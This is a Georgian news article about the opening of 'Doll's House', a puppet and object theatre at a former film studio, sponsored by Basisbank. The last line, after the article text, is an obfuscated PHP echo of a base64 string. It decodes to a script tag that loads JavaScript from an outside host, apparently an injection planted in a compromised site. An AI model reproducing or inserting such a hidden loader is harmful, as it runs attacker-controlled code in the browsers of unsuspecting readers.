celsiusi
ავერსი შნაიდერი
ბაზისბანკის მხარდაჭერით და კულტურის სამინისტროს ხელშეწყობით, ძველი კინოსტუდიის ტერიტორიაზე, ახალი თეატრალური სივრცე - „თოჯინების სახლი“ გაიხსნა.
 

„თოჯინების სახლი“ არის მრავალფუნქციური კულტურულ-საგანმანათლებლო სივრცე. გარდა თოჯინების და საგნების თეატრისა, თეატრის სცენა დაეთმობა საზოგადოებისთვის ცნობილ ადამიანებს, მსახიობებს, შემსრულებლებს. გაიმართება შემოქმედებითი საღამოები, კონცერტები, სალონური შეხვედრები. პროექტის მიზანია, თეატრში ფუნქციონირებდეს კინოთეატრიც და ამ გზით მაქსიმალურად შეეწყოს ხელი ახალგაზრდა კინოხელოვანთა პროფესიულ განვითარებასა და მათი ნამუშევრების წარდგენას.

თეატრი „თოჯინების სახლი“ გაიხსნა ნიკა საბაშვილის სპექტაკლით „რეჟისორის ცოლი“, რომელიც ცნობილი ქართველი რეჟისორის, სანდრო ახმეტელის მეუღლის - თამარ წულუკიძის ტრაგიკულ ისტორიას მოგვითხრობს.

დამოუკიდებელი თეატრი - „თოჯინების სახლი“ მნიშვნელოვანი მოვლენაა თოჯინური ხელოვნების და მთლიანად დარგის განვითარებისთვის. ამ განსხვავებული თეატრალური გარემოს შექმნის იდეა და ინიციატივა ეკუთვნის რეჟისორ ნიკა საბაშვილს და შექმნის მიზანია, თეატრის სპექტაკლები შეესაბამებოდეს როგორც მოზარდი, ასევე, უფროსი თაობის ინტერესებს და მათ ესთეტიკურ წარმოდგენებს.

„თოჯინების სახლი“ დღემდე არსებული თეატრალური წარმოდგენებისგან რადიკალურად განსხვავებულ სპექტაკლებს შესთავაზებს მაყურებელს. გარდა იმისა, რომ ცნობილი კლასიკური თუ თანამედროვე დრამატურგიის პერსონაჟები წარმოდგენილი იქნებიან თოჯინებისა და საგნების სახით, სხვადასხვა დეტალის მხატვრული დამუშავებით მიიღება სრულიად განსხვავებული ეფექტი, ეს კი ახალი მხატვრული ტენდენციების დანერგვის საუკეთესო წინაპირობაა.

თეატრში, უახლოეს მომავალში, დასადგმელად შერჩეულია ისეთი ნაწარმოებები, რომელთა თემები დღესაც აქტუალურია, ეხმიანება თანამედროვეობას და რომლებიც გამოირჩევა მაღალმხატვრული ღირებულებით.

ბაზისბანკი, კორპორაციული სოციალური პასუხისმგებლობის ფარგლებში, ქართული კულტურის აქტიური მხარდამჭერია. ბანკი გენერალურ სპონსორობას უწევს კოტე მარჯანიშვილის სახელობის თეატრს, თოჯინების თეატრების გაერთიანებას და მხარს უჭერს ქვეყნის მასშტაბით არაერთი კულტურული ღონისძიების განხორციელებას.

154
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");